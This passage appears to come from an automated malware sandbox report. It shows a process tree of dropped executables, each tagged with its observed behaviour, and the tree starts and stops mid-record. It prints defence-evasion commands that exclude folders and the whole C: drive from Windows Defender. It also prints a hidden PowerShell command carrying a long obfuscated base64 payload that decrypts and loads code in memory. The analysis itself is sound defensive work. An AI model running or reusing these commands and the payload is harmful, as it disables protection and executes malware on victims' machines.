        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2548
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        9⤵
        Executes dropped EXE
        
        PID:6604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6656
      - C:\Users\Admin\AppData\Local\Temp\10380550101\dd83afce66.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380550101\dd83afce66.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2944
      - C:\Users\Admin\AppData\Local\Temp\10381930101\69ef18966e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381930101\69ef18966e.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5948
      - C:\Users\Admin\AppData\Local\Temp\10381940101\2f5c500416.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381940101\2f5c500416.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3136
      - C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4920
      - C:\Users\Admin\AppData\Local\Temp\10381960101\80971a3226.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381960101\80971a3226.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 724
        7⤵
        Program crash
        
        PID:3368
      - C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5420
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4340
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:5052
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:1424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\{0cd921b0-ef0e-4fc0-a8e7-8991434f96aa}\389f4e0c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{0cd921b0-ef0e-4fc0-a8e7-8991434f96aa}\389f4e0c.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:9176
        
        C:\Users\Admin\AppData\Local\Temp\{5d177761-967f-4308-99f5-2b97bcf67928}\07797712.exe
        
        C:/Users/Admin/AppData/Local/Temp/{5d177761-967f-4308-99f5-2b97bcf67928}/\07797712.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:10124
      - C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5572
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
      - C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7780
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:8156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:4860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:8400

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:4924
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3508 -ip 3508
1⤵
PID:1252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:13252

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:13304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{05153dd9-b861-4ac2-830e-07f05cd13009}\c11cba54-f45d-4da0-9170-b7d29a6abc58.cmd"
1⤵
PID:10208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11624
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11816
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12412
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:544
- C:\Windows\system32\PING.EXE
